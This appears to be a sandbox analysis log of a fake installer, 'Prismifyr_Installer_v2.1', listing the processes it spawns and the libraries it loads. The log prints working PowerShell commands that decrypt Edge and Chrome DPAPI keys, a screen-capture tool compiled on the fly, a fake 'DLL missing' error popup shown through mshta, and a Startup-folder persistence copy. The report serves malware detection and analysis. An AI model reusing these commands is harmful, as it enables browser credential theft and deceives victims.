Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E2A.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSCEE08CA83D7542AAB04A7698A66ECD4F.TMP"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png"
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe"
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2244,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --field-trial-handle=2516,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:3Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" "Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /fo csvJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E2A.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSCEE08CA83D7542AAB04A7698A66ECD4F.TMP"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: mscms.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeSection loaded: mmdevapi.dllJump to behavior
